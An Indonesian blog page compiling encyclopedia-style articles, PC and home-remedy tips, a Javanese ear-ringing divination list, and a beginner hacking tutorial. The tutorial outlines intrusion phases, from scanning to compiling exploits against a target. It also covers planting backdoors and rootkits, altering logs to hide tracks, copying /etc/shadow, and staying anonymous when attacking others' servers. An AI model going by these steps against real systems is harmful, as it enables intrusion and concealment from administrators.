Berbagi Informasi Menarik :)

Mountain

A mountain is a large landform that stretches above the surrounding land in a limited area usually in the form of a peak. A mountain is generally steeper than a hill. The adjective montane is used to describe mountainous areas and things associated with them. The study of mountains is called Orography. Exogeology deals with planetary mountains, which in that branch of science are usually called montes (singular—mons). The highest mountain on Earth based from sea level is Mount Everest (8,848 m (29,029 ft)) in the Himalayas of Asia. The highest known mountain in the Solar System is Olympus Mons on the planet Mars at 21,171 m (69,459 ft). Mountains and mountain ranges on Earth are typically formed by the movement and/or interaction of lithospheric plates.

Classified by the geological processes that shape them, there are five major types of mountains:
Left to right: Mount Everest, Lhotse and Ama Dablam in the Himalayas
Mount Kinabalu, 4,101 metres (13,455 ft), Malaysia
The Adirondack Mountains of New York are remnants of an eroded plateau.
Fold mountains
Fold mountains are the most common type of mountains. They are formed due to collision of two plates, causing folding of the Earth's crust. Examples of fold mountains are the Himalayas of Asia and the Alps in Europe.
Fault-Block mountains
As the name suggests, fault-block mountains or fault mountains are formed when blocks of rock materials slide along faults in the Earth's crust. There are two types of block mountains, namely the lifted and tilted. Lifted mountains have two steep sides; whereas, the tilted type has one steep side and a gentle sloping side. Examples of fault-block mountains are found in the Sierra Nevada mountain range of the western United States.
Volcanic mountains
Volcanic mountains are formed due to volcanic eruptions where magma piles up on the surface of the Earth. Examples of volcanoes include Mount Fuji in Japan and Mount Pinatubo in the Philippines. Inactive or extinct volcanic mountain include Mount Elbrus in Russia, Mount Kinabalu in Malaysia, Cotopaxi in Ecuador and Aconcagua in Argentina/
Dome mountains
Dome mountains are formed when the hot magma rises from the mantle and uplifts the overlying sedimentary layer of the Earth's crust. In the process, the magma is not erupted, but it cools down and forms the core of the mountain. They are called dome mountains due to their appearance that resembles a dome shape. An example of a dome mountain is Navajo Mountain in the U.S. state of Utah.
Plateau mountains
Plateau mountains are formed erosion of an uplifted plateau. Examples of plateau mountains are in the Adirondack Mountains in the U.S. state of New York.



Avenged Sevenfold a7x

Avenged Sevenfold (often abbreviated A7X) is an American heavy metal band from Huntington Beach, California. Formed in 1999, the group consists of M. Shadows (vocalist), Synyster Gates (lead guitarist), Zacky Vengeance (rhythm guitarist), and Johnny Christ (bassist).
They are known for their diverse rock sound, dramatic imagery in album covers and t-shirts. Avenged Sevenfold emerged with a metalcore sound on their debut Sounding the Seventh Trumpet but their style had evolved by their third album and first major label release, City of Evil into a hard rock/heavy metal sound. The band continued to explore new sounds with their self-titled release and enjoyed continued mainstream success before their drummer, James "The Rev" Sullivan, died in 2009. Despite his death, the band continued on with help of now-former Dream Theater drummer Mike Portnoy and released and toured in support of their fifth album Nightmare in 2010 which debuted on the top spot of the Billboard 200, their first number one debut.
To date, Avenged Sevenfold has released five studio albums, one live album/compilation/DVD, and eighteen singles and sold more than four million albums worldwide.The band has received much credit for their worldwide mainstream success and were featured as second place on Ultimate Guitar's Top Ten Bands of the Decade.


Prestation

Year Nominated work Award Result
2011 Mike Portnoy on Nightmare Golden God Awards: Best Drummer Won
Synyster Gates & Zacky Vengeance on Nightmare Golden God Awards: Best Guitarists Won
M. Shadows on Nightmare Golden God Awards: Best Vocalist Won
Nightmare Golden God Awards: Album of the Year Won
"Buried Alive" Revolver Magazine's Song of the Year 2011 Nominated

History of Chelsea Football Club

This article documents the History of Chelsea Football Club, an English association football team based in Fulham, West London. For a general overview of the club, see Chelsea F.C.
Founded in 1905, Chelsea quickly gained a reputation for signing big name players and for attracting large crowds, but failed to win a major trophy in their first fifty years. They spent thirty of their first forty seasons in the First Division, although often found themselves finishing in mid-table or battling relegation. The closest Chelsea came to success was in the FA Cup; they were runners-up in 1915 and losing semi-finalists in 1911, 1920, 1932, 1950 and 1952. The duck was finally broken by manager Ted Drake, who introduced a series of changes at the club and led Chelsea to the League Championship in 1955.
The period 1963–72 saw Chelsea regularly challenge for honours for the first time, although they often narrowly missed out. The League Cup was won in 1965, the FA Cup in 1970 and the UEFA Cup Winners' Cup in 1971; they were also FA Cup runners-up in 1967 and League Cup runners-up in 1972. Several problems over the next decade, principally the debt burden caused by an ambitious attempt to redevelop Stamford Bridge, brought the club to the brink of extinction, before a revival under John Neal in the mid-1980s saw the club win the Second Division title and ultimately re-establish itself in the top flight.
A further revival under managers Ruud Gullit and Gianluca Vialli from 1996–2000 saw Chelsea win the FA Cup in 1997 and 2000, the League Cup and UEFA Cup Winners' Cup in 1998, and qualify for the Champions League for the first time; the club have not finished outside of the top six in the Premier League since the 1995–96 season. In 2003, Chelsea were bought by Russian billionaire Roman Abramovich, ushering in the club's current phase of success. José Mourinho led them to two league titles, an FA Cup and two League Cups in three seasons. The club added a further FA Cup in 2009, and then their first League and FA Cup "Double" in 2010.

Bermuda Triangle Mystery

The Bermuda Triangle, also known as the Devil's Triangle, is a region in the western part of the North Atlantic Ocean where a number of aircraft and surface vessels reportedly disappeared under mysterious circumstances.
Popular culture has attributed these disappearances to the paranormal or activity by extraterrestrial beings.Documented evidence indicates that a significant percentage of the incidents were inaccurately reported or embellished by later authors, and numerous official agencies have stated that the number and nature of disappearances in the region is similar to that in any other area of ocean

The earliest allegation of unusual disappearances in the Bermuda area appeared in a September 16, 1950 Associated Press article by Edward Van Winkle Jones.Two years later, Fate magazine published "Sea Mystery at Our Back Door",a short article by George X. Sand covering the loss of several planes and ships, including the loss of Flight 19, a group of five U.S. Navy TBM Avenger bombers on a training mission. Sand's article was the first to lay out the now-familiar triangular area where the losses took place. Flight 19 alone would be covered in the April 1962 issue of American Legion Magazine. It was claimed that the flight leader had been heard saying "We are entering white water, nothing seems right. We don't know where we are, the water is green, no white." It was also claimed that officials at the Navy board of inquiry stated that the planes "flew off to Mars." Sand's article was the first to suggest a supernatural element to the Flight 19 incident. In the February 1964 issue of Argosy, Vincent Gaddis's article "The Deadly Bermuda Triangle" argued that Flight 19 and other disappearances were part of a pattern of strange events in the region.The next year, Gaddis expanded this article into a book, Invisible Horizons.
Others would follow with their own works, elaborating on Gaddis's ideas: John Wallace Spencer (Limbo of the Lost, 1969, repr. 1973);Charles Berlitz (The Bermuda Triangle, 1974); Richard Winer (The Devil's Triangle, 1974), and many others, all keeping to some of the same supernatural elements outlined by Eckert

Area triangle
The boundaries of the triangle cover the Straits of Florida, the Bahamas and the entire Caribbean island area and the Atlantic east to the Azores. The more familiar triangular boundary in most written works has as its points somewhere on the Atlantic coast of Miami; San Juan, Puerto Rico; and the mid-Atlantic island of Bermuda, with most of the accidents concentrated along the southern boundary around the Bahamas and the Florida Straits.
The area is one of the most heavily traveled shipping lanes in the world, with ships crossing through it daily for ports in the Americas, Europe, and the Caribbean Islands. Cruise ships are also plentiful, and pleasure craft regularly go back and forth between Florida and the islands. It is also a heavily flown route for commercial and private aircraft heading towards Florida, the Caribbean, and South America from points north.

Beautifully waterfalls in World


Waterfalls are commonly formed when a river is young.At these times the channel is often narrow and deep. When the river courses over resistant bedrock, erosion happens slowly, while downstream the erosion occurs more rapidly. As the watercourse increases its velocity at the edge of the waterfall, it plucks material from the riverbed. Whirlpools created in the turbulence as well as sand and stones carried by the watercourse increase the erosion capacity. This causes the waterfall to carve deeper into the bed and to recede upstream. Often over time, the waterfall will recede back to form a canyon or gorge downstream as it recedes upstream, and it will carve deeper into the ridge above it. The rate of retreat for a waterfall can be as high as one and half meters per year.
Often, the rock stratum just below the more resistant shelf will be of a softer type, meaning that undercutting due to splashback will occur here to form a shallow cave-like formation known as a rock shelter under and behind the waterfall. Eventually, the outcropping, more resistant cap rock will collapse under pressure to add blocks of rock to the base of the waterfall. These blocks of rock are then broken down into smaller boulders by attrition as they collide with each other, and they also erode the base of the waterfall by abrasion, creating a deep plunge pool or gorge.
Baatara gorge waterfall near Tannourin, Lebanon
Streams become wider and shallower just above waterfalls due to flowing over the rock shelf, and there is usually a deep area just below the waterfall because of the kinetic energy of the water hitting the bottom. Waterfalls normally form in a rocky area due to erosion. After a long period of being fully formed, the water falling off the ledge will retreat, causing a horizontal pit parallel to the waterfall wall. Eventually, as the pit grows deeper, the waterfall collapses to be replaced by a steeply sloping stretch of river bed. In addition to gradual processes such as erosion, earth movement caused by earthquakes or landslides or volcanoes can cause a differential in land heights which interfere with the natural course of a water flow, and result in waterfalls.
A river sometimes flows over a large step in ǐthe rocks that may have been formed by a fault line. Waterfalls can occur along the edge of a glacial trough, where a stream or river flowing into a glacier continues to flow into a valley after the glacier has receded or melted. The large waterfalls in Yosemite Valley are examples of this phenomenon, which is referred to as a hanging valley. Another reason hanging valleys may form is where two rivers join and one is flowing faster than the other. Waterfalls can be grouped into ten broad classes based on the average volume of water present on the fall (which depends on both the waterfall's average flow and its height) using a logarithmic scale. Class 10 waterfalls include Niagara Falls, Paulo Afonso Falls and Khone Falls.
Classes of other well-known waterfalls include Victoria Falls and Kaieteur Falls (Class 9); Rhine Falls and Gullfoss (Class 8); Angel Falls and Dettifoss (Class 7); Yosemite Falls, Lower Yellowstone Falls and Umphang Thee Lor Sue Waterfall (Class 6); Sutherland Falls (Class 5)

About Borobudur

Borobudur, or Barabudur, is a 9th-century Mahayana Buddhist monument in Magelang, Central Java, Indonesia. The monument comprises six square platforms topped by three circular platforms, and is decorated with 2,672 relief panels and 504 Buddha statues. A main dome, located at the center of the top platform, is surrounded by 72 Buddha statues seated inside perforated stupa.
The monument is both a shrine to the Lord Buddha and a place for Buddhist pilgrimage. The journey for pilgrims begins at the base of the monument and follows a path circumambulating the monument while ascending to the top through the three levels of Buddhist cosmology, namely Kāmadhātu (the world of desire), Rupadhatu (the world of forms) and Arupadhatu (the world of formlessness). During the journey, the monument guides the pilgrims through a system of stairways and corridors with 1,460 narrative relief panels on the walls and the balustrades.

In Indonesian, ancient temples are known as candi; thus "Borobudur Temple" is locally known as Candi Borobudur. The term candi is also used more loosely to describe any ancient structure, for example gates and bathing structures. The origins of the name Borobudur however are unclear, although the original names of most ancient Indonesian temples are no longer known. The name Borobudur was first written in Sir Thomas Raffles' book on Javan history. Raffles wrote about a monument called borobudur, but there are no older documents suggesting the same name.The only old Javanese manuscript that hints at the monument as a holy Buddhist sanctuary is Nagarakretagama, written by Mpu Prapanca in 1365.
The name Bore-Budur, and thus BoroBudur, is thought to have been written by Raffles in English grammar to mean the nearby village of Bore; most candi are named after a nearby village. If it followed Javanese language, the monument should have been named 'BudurBoro'. Raffles also suggested that 'Budur' might correspond to the modern Javanese word Buda ("ancient") – i.e., "ancient Boro".However, another archaeologist suggests the second component of the name (Budur) comes from Javanese term bhudhara (mountain).
The references about the construction and inauguration of a sacred buddhist building — possibly refer to Borobudur — was mentioned in two inscriptions, both discovered in Kedu, Temanggung Regency. The Karangtengah inscription dated 824 mentioned vaguely about a sacred building named Jinalaya (the realm of those who have conquer worldly desire and reach enlightenment) inaugurated by Pramodhawardhani daughter of Samaratungga. The Tri Tepusan inscription dated 842 mentioned about the sima (tax-free) lands awarded by Çrī Kahulunnan (Pramodhawardhani) to ensure the funding and maintenance of a Kamūlān called Bhūmisambhāra. Kamūlān itself from the word mula which means 'the place of origin', a sacred building to honor the ancestors, probably the ancestors of the Sailendras. Casparis suggested that Bhūmi Sambhāra Bhudhāra which in Sanskrit means "The mountain of combined virtues of the ten stages of Boddhisattvahood", was the original name of Borobudur

Evidence suggests Borobudur was constructed in the 9th century and abandoned following the 14th century decline of Buddhist and Hindu kingdoms in Java, and the Javanese conversion to Islam.Worldwide knowledge of its existence was sparked in 1814 by Sir Thomas Stamford Raffles, then the British ruler of Java, who was advised of its location by native Indonesians. Borobudur has since been preserved through several restorations. The largest restoration project was undertaken between 1975 and 1982 by the Indonesian government and UNESCO, following which the monument was listed as a UNESCO World Heritage Site.borobudur is still used for pilgrimage; once a year Buddhists in Indonesia celebrate Vesak at the monument, and Borobudur is Indonesia's single most visited tourist attraction

Political Structure

Ancient Greece consisted of several hundred more or less independent city-states (poleis). This was a situation unlike that in most other contemporary societies, which were either tribal, or kingdoms ruling over relatively large territories. Undoubtedly the geography of Greece—divided and sub-divided by hills, mountains and rivers
Contributed to the fragmentary nature of ancient Greece. On the one hand, the ancient Greeks had no doubt that they were 'one people'; they had the same religion, same basic culture, and same language. Furthermore, the Greeks were very aware of their tribal origins; Herodotus was able to extensively categorise the city-states by tribe. Yet, although these higher-level relationships existed, they seem to have rarely had a major role in Greek politics. The independence of the poleis was fiercely defended; unification was something rarely contemplated by the ancient Greeks. Even when, during the second Persian invasion of Greece, a group of city-states allied themselves to defend Greece, the vast majority of poleis remained neutral, and after the Persian defeat, the allies quickly returned to infighting.
Initially many Greek city-states seem to have been petty kingdoms; there was often a city official carrying some residual, ceremonial functions of the king (basileus), e.g. the archon basileus in Athens.However, by the Archaic period and the first historical consciousness, most had already become aristocratic oligarchies. It is unclear exactly how this change occurred. For instance, in Athens, the kingship had been reduced to a hereditary, life-long chief magistracy (archon) by c. 1050 BC; by 753 BC this had become a decennial, elected archonship; and finally by 683 BC an annually elected archonship. Through each stage more power would have been transferred to the aristocracy as a whole, and away from a single individual.
Inevitably, the domination of politics and concomitant aggregation of wealth by small groups of families was apt to cause social unrest in many poleis. In many cities a tyrant (not in the modern sense of repressive autocracies), would at some point seize control and govern according to their own will; often a populist agenda would help sustain them in power. In a system racked with class conflict, government by a 'strongman' was often the best solution.
Athens fell under a tyranny in the second half of the 6th century. When this tyranny was ended, the Athenians founded the world's first democracy as a radical solution to prevent the aristocracy regaining power. A citizens' assembly (the Ecclesia), for the discussion of city policy, had existed since the reforms of Draco in 621 BC; all citizens were permitted to attend after the reforms of Solon (early 6th century), but the poorest citizens could not address the assembly or run for office. With the establishment of the democracy, the assembly became the de jure mechanism of government; all citizens had equal privileges in the assembly. However, non-citizens, such as metics (foreigners living in Athens) or slaves, had no political rights at all.
After the rise of the democracy in Athens, other city-states founded democracies. However, many retained more traditional forms of government. As so often in other matters, Sparta was a notable exception to the rest of Greece, ruled through the whole period by not one, but two hereditary monarchs. This was a form of diarchy. The Kings of Sparta belonged to the Agiads and the Eurypontids, descendants respectively of Eurysthenes and Procles. Both dynasty founders were believed to be twin sons of Aristodemus, a Heraclid ruler. However, the powers of these kings was trammeled by both a council of elders (the Gerousia) and magistrates specifically appointed to watch over the kings

Thus, the major peculiarities of the ancient Greek political system were; firstly, its fragmentary nature, and that this does not particularly seem to have tribal origin; and secondly the particular focus on urban centres within otherwise tiny states. The peculiarities of the Greek system are further evidenced by the colonies that they set up throughout the Mediterranean Sea, which, though they might count a certain Greek polis as their 'mother' (and remain sympathetic to her), were completely independent of the founding city.
Inevitably smaller poleis might be dominated by larger neighbours, but conquest or direct rule by another city-state appears to have been quite rare. Instead the poleis grouped themselves into leagues, membership of which was in a constant state of flux. Later in the Classical period, the leagues would become fewer and larger, be dominated by one city (particularly Athens, Sparta and Thebes); and often poleis would be compelled to join under threat of war (or as part of a peace treaty). Even after Philip II of Macedon 'conquered' the heartlands of ancient Greece, he did not attempt to annex the territory, or unify it into a new province, but simply compelled most of the poleis to join his own Corinthian League.






Mempercepat booting windows Xp

Apakah anda termasuk orang yang perfect timing?
Jika YA berarti saya pastikan anda sering jengkel ketika PC/Notebook kesayangan anda booting dengan lambat...
Jangan khawatir,
Saya punya tips n trik mempercepat booting komputer/laptop anda yang berbasis windows xp...
Langsung saja ikuti langkah2 berikut ini...


Langkah 1 :
Buka aplikasi notepad
Ketikkan “ del c:\windows\prefetch\ntosboot-*.*/q ” (Tanpa tanda kutip )
dan save as dengan nama ntosboot.bat dalam drive c:\

Langkah 2 :
Lalu klik menu Start–>Run–> dan ketikkan gpedit.msc

Langkah 3 :
Klik Computer Configuration–>Windows Settings–>Script–>lalu klik 2 kali pada Shutdown

Langkah 4 :
Dalam Windows Shutdown Properties klik add lalu browse. lalu cari letak file ntosboot.bat yang anda buat tadi dan klik open

Langkah 5 :
Lalu klik OK ,Apply dan OK sekali lagi untuk menyelesaikannya

Langkah 6 :
Lalu klik menu Start–>Run–> dan devmgmt.msc

Langkah 7 :
Klik IDE ATA/ATAPI controllers–>Primary IDE Channel ( Klik 2 kali untuk membuka properties )

Langkah 8 :
Pilih Advanced Settings
Pada Device 0 atau Device 1
Ganti Device Type menjadi None ( Ganti saja pilihan Device Type yang tidak terkunci )

Langkah 9 :
Klik IDE ATA/ATAPI controllers–>Secondary IDE Channel ( Klik 2 kali untuk membuka properties )
Ulangi seperti Langkah 8

Langkah 10 :
Restart Komputer anda dan anda bisa lihat perubahannya.

Semoga Bermanfaat !!

Misteri di balik dengungan telinga

Anda mungkin pernah mengalami dengungan telinga anda saat bangun tidur,
Atau pun Saat anda sedang bekerja tiba2 telinga anda berdengung,
Ini bisa saja terjadi akibat masalah medis atau bahkan hanya kebetulan saja,
Tapi tahukah anda,
Dalam primbon jawa telinga berdengung di percaya bukan hanya sebuah kebetulan melainkan ada arti di tiap saat2 telinga kita berdengung,
Berikut ini arti dari dengungan telinga menurut primbon jawa,
Anda boleh saja percaya/tidak,
Semua tergantung keyakinan anda masing,
Tetapi tidak ada salah nya jika primbon ini kita jadikan acuan agar kita lebih berhati2 tanpa harus mempercayai nya.,
Baiklah ini pertanda telinga berdengung tersebut...


Telinga sebelah kanan berdenging
antara pada jam 06-07 pagi hari
bermakna akan mendapat kabar buruk
antara jam 07 - 08 pagi hari
bermakna akan difitnahkan orang yang menjadikan guncingan orang
antara jam 08 - 09 pagi hari
bermakna akan berencana pergi jauh dan entah itu sendiri atau bersama orang lain
antara jam 09 - 10 pagi hari
bermakna akan ada berita yang kurang menyenangkan tentang keluarga
antara jam 10 - 11 pagi hari
bermakna akan ada penghalang dari rencana perjalanan anda sebaiknya ditunda atau dibatalkan dulu
antara jam 11 - 12 siang hari
bermakna akan ada khabar yang kurang mengenakkan yang datangnya bersamaan dengan surat yang akan diterima dalam waktu dekat
antara jam 12 - 13 siang hari
bermakna akan ada saudara jauh yang datang dengan membawa cerita lama
antara jam 13 - 14 siang hari
bermakna akan ada ajakan maka-makan
antara jam 14 - 15 siang hari
bermakna akan ada sesuatu yang membahayakan anda dalam waktu dekat
antara jam 15 - 16 sore hari
bermakna akan ada berita dari keluarga yang entah itu yang menyenangkan atau menyedihkan
antara jam 16 - 17 sore hari
bermakna akan ada perjalanan jauh yang akan anda lakukan dalam waktu dekat
antara jam 17 - 18 sore hari
bermakna anda sedang menjadi pembicaraan banyak orang
antara jam 18 - 19 sore hari
bermakna akan ada sesuatu yang berharga pergi meninggalkan anda
antara jam 19 - 20 malam hari
bermakna akan mendapat berita buruk dari kalangan sendiri
antara jam 20 - 21 malam hari
bermakna akan ada keberuntungan yang besar untuk anda
antara jam 21- 22 malam hari
bermakna akan ada yang mengancam anda
antara jam 22 -23 malam hari
bermakna akan ada berita yang baik datang kepada anda
antara jam 23 - 24 malam hari
bermakna akan ada seseorang yang jatuh cinta
antara jam 24 - 01 pagi hari
bermakna akan ada sesuatu wejangan yang diberikan oleh orang tua
antara jam 01- 02 pagi hari
bermakna akan ada perselisihan antara kerabat sendiri
antara jam 02- 03 pagi hari
bermakna segala perjalanan yang ada kerjakan akan selamat sampai tujuan.
antara jam 03- 04 pagi hari
bermakna akan ada yang sesuatu yang hilang yang anda nilai sangat berharga
antara jam 04- 05 pagi hari
bermakna akan ada sesuatu yang merugikan anda jika anda seorang pekerja anda akan diberi peringatan dari pimpinan
antara jam 05- 06 pagi hari
bermakna akan ada orang yang akan mencelakakan anda

Telinga sebelah kiri berdenging
antara jam 06-07 pagi
bermakna akan ada tamu yang menguntungkan dalam waktu dekat.
antara jam 07-08 pagi
bermakna akan melakukan perjalan jauh dalam waktu dekat antara jam 08-09 pagi
bermakna akan kedatangan keluarga dekat antara jam 10-11 pagi
bermakna akan selamat dalam perjalanan yang akan datang
antara jam 11-12 siang
bermakna akan kedatangan keluarga dari seberang lautan
antara jam 12-13 siang
bermakna akan terserang penyakit dalam waktu dekat
antara jam 14-15 siang
bermakna akan kedatangan tamu
antara jam 15-16 sore
bermakna akan bepergian jauh baik beurusan usaha atau urusan kerja, sendiri atau bersama-sama.
antara jam 17-18 sore
bermakna dalam waktu dekat akan mendapat keuntungan besar bagi usaha dagang yang dirintis dan dalam waktu dekat akan naik pangkat bagi pekerjaan.
antara jam 19-20 malam
bermakna akan menerima pernyataan cinta dari seseorang dalam waktu dekat ini.
antara jam 21-22 malam
bermakna akan menerima undangan perkawinan dari teman dekat
antara jam 22-23 malam
bermakna akan kedatangan pencuri
antara jam 23-24 malam
bermakna akan menghadapi penghalang dalam mengurus perkara yang sedang dihadapi
antara jam 00- 01 dini hari
bermakna semua cita-cita akan yang direncanakan akan segera tercapai
antara jam 01- 02 dini hari
bermakna akan menerima kabar yang sangat menyengkan
antara jam 02- 03 dini hari
bermakna akan ada perseturuan dalam keluarga.
antara jam 04- 05 pagi hari
bermakna and akan mendapat usaha pekerjaan baru
antara jam 05- 06 pagi hari
bermakna akan ada musyawarah dan mufakat dalam setiap persoalan yang dihadapi oleh anda sebagai jalan keluarnya.

Itu lah primbon jawa mengenai telinga yg berdengung,
Sekali lagi saya sampaikan,
Anda tidak harus mempercayai nya tapi alangkah baiknya jika dijadikan acuan untuk anda lebih berhati2 dalam menjalankan kehidupan ini...

Semoga Bermanfaat !!!

Cara Tradisional Menghilangkan Bau Mulut

Bau mulut memang-lah hal yang wajar dan manusiawi,

Setiap bangun pagi bau mulut pasti kurang mengenak kan...

Tapi jika bau mulut terus saja terjadi sepanjang hari,

Pasti sangat memalukan....

Buat kamu yang punya masalah dengan bau mulut,
Jangan takut saya punya sedikit informasi untuk mengatasi masalah tersebut....

Yang harus di persiapkan adalah :

-Serbuk kayu manis/ kayu manis yang sudah di tumbuk halus,

Banyak di jual di pasar-pasar umum

-Madu asli

-Air panas kuku/ Air hangat

Cara meracik bahan-nya sangat mudah,

-Siapkan Gelas

-Masukkan serbuk kayu manis secukup-nya

-Kemudian masukkan juga madu asli

-Lalu seduh lah dengan air hangat dan aduk hingga merata

Setelah semua komposisi sudah terbuat...

-Berkumur-lah dengan air madu campur serbuk kayu manis tersebut

lakukan secara rutin sekali setiap hari sampai bau mulut anda wangi permanen !!

Semoga bermanfaat !!!

Tutor hacking !

Belajar Hack Yukc...

Intro
Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.
Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.
Bagian 1
*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ’standar’, hacking sebenarnya tidak harus selalu sesuai dengan ’standar’ ini.
Hacking buat pemula
- by aCh
Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….
Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….
Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.
Pro dan Kontra Hacking

Pro
Kontra
Etika Hacking
Semua informasi adalah free
Jika semua informasi adalah free, maka tidak ada lagi privacy
Aspek Security
Intrusion adalah ilustrasi kelemahan sistem
Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci
Idle Machines
Hacking hanya pada idle machines
idle machines milik siapa ?
science education
hanya membobol tapi tidak merusak
“hacker wannabe” berpotensi sangat besar untuk merusak
Okeh, sekarang waktunya melakukan aksi…
1. Fase Persiapan
~ Mengumpulkan informasi sebanyak-banyaknya
- Secara Aktif : - portscanning
- network mapping
- OS Detection
- application fingerprinting
Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat
- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)
- via internet registries (informasi domain, IP Addres)
- Website yang menjadi terget
2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->
$gcc -o exploit exploit.c
$./exploit
# hostname (# tanda mendapatkan akses root)
remote host -> $gcc -o exploit exploit.c
$./exploit -t www.target.com
# (klo beruntung mendapatkan akes root)
~ Brute Force
- Secara berulang melakukan percobaan otentifikasi.
- Menebak username dan password.
- Cracking password file
~ Social Engineering
- Memperdayai user untuk memeberi tahu Username dan password
- Intinya ngibulin user….
3. Fase Setelah Eksekusi
~ Menginstall backdoor, trojans, dan rootkit
~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin
~ Menyalin /etc/passwd atau /etc/shadow/passwd
Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!

Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.

